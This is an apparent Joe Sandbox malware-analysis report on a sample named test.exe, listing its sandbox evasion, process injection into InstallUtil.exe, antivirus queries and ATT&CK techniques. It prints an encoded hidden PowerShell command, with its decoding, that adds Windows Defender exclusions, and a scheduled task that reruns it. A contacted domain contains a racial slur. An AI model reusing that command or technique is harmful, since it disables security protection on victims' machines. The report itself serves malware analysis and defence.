                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara match, File source: Process Memory Space: Product.exe PID: 5136, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\test.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\Desktop\test.exe Memory allocated: 2E70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\test.exe Memory allocated: 30B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\test.exe Memory allocated: 2EF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Memory allocated: 2F20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Memory allocated: 31A0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: FE0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2A70000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4A70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Memory allocated: F80000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Memory allocated: 28F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Memory allocated: 4A30000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\test.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 438000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 337000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 464000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6882
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2819
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 5380
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 4440
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6735
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2867
                      Source: C:\Users\user\Desktop\test.exe TID: 4944 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416 Thread sleep count: 6882 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4424 Thread sleep count: 2819 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3060 Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe TID: 5672 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep count: 39 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -35971150943733603s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5496 Thread sleep count: 5380 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59859s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5496 Thread sleep count: 4440 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59735s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59610s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59485s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59360s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59189s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59063s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58898s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58791s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58641s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58511s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58407s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58266s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6236 Thread sleep time: -438000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59889s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59781s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59658s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59532s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59407s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59281s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59166s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59061s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58953s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58844s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58735s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58610s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58485s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58360s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6236 Thread sleep time: -337000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59875s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59766s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59641s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59516s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59406s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59297s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59187s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59058s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58948s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58827s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58719s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58609s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58500s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58391s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -58281s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6236 Thread sleep time: -464000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59874s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59765s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59656s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59546s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59432s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388 Thread sleep time: -59327s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312 Thread sleep count: 6735 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200 Thread sleep count: 2867 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5380 Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe TID: 6016 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\test.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\test.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: InstallUtil.exe, 00000005.00000002.2742988264.0000000005590000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllstringHeight
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\test.exe Code function: 0_2_057F29F0 LdrInitializeThunk,0_2_057F29F0
                      Source: C:\Users\user\Desktop\test.exe Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\test.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
                      Source: unknown Process created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\tina\AppData\Local,C:\Users\tina\AppData\Local\Temp\; Add-MpPreference -ExclusionProcess Product.exe;
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 496000
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 498000
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 92A008
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcahqaaqbuageaxabbahaacabeageadabhafwatabvagmayqbsacwaqwa6afwavqbzaguacgbzafwadabpag4ayqbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabqahiabwbkahuaywb0ac4azqb4aguaowa=
                      Source: C:\Users\user\Desktop\test.exe Queries volume information: C:\Users\user\Desktop\test.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe Queries volume information: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Users\user\Desktop\test.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Product.exe, 00000004.00000002.1561050720.0000000005C6C000.00000004.00000020.00020000.00000000.sdmp, Product.exe, 0000000C.00000002.2212887995.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Product.exe, 0000000C.00000002.2212887995.0000000000E2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Product.exe, 0000000C.00000002.2237234313.0000000005690000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: amFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\test.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 131 Windows Management Instrumentation | 11 Scheduled Task/Job | 311 Process Injection | 1 Masquerading | OS Credential Dumping | 131 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | 11 Scheduled Task/Job | Logon Script (Windows) | 1 DLL Side-Loading | 141 Virtualization/Sandbox Evasion | Security Account Manager | 141 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | 3 PowerShell | Login Hook | Login Hook | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 123 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 22 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                      [Behavior graph: ID 1574666, Sample: test.exe, Start date: 13/12/2024, Architecture: WINDOWS, Score: 100]

                      Source | Detection | Scanner | Label | Link
                      test.exe | 100% | Avira | HEUR/AGEN.1360822 |
                      test.exe | 100% | Joe Sandbox ML | |

                      Source | Detection | Scanner | Label | Link
                      C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe | 100% | Avira | HEUR/AGEN.1360822 |
                      C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      iam.nigga.dad | 103.230.121.81 | true | false | | unknown
                                                                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                  103.230.121.81 | iam.nigga.dad | Hong Kong | | 62468 | VPSQUANUS | false
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1574666
                                                                  Start date and time:2024-12-13 13:26:14 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 13s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:14
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:test.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.evad.winEXE@10/13@1/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 80%
                                                                  HCA Information:
                                                                  • Successful, ratio: 92%
                                                                  • Number of executed functions: 174
                                                                  • Number of non-executed functions: 116
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 7056 because it is empty
                                                                  • Not all processes were analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • VT rate limit hit for: test.exe
                                                                  Time | Type | Description
                                                                  07:27:21 | API Interceptor | 1x Sleep call for process: test.exe modified
                                                                  07:27:26 | API Interceptor | 57x Sleep call for process: powershell.exe modified
                                                                  07:27:27 | API Interceptor | 1579046x Sleep call for process: InstallUtil.exe modified
                                                                  12:27:22 | Task Scheduler | Run new task: pebv path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=
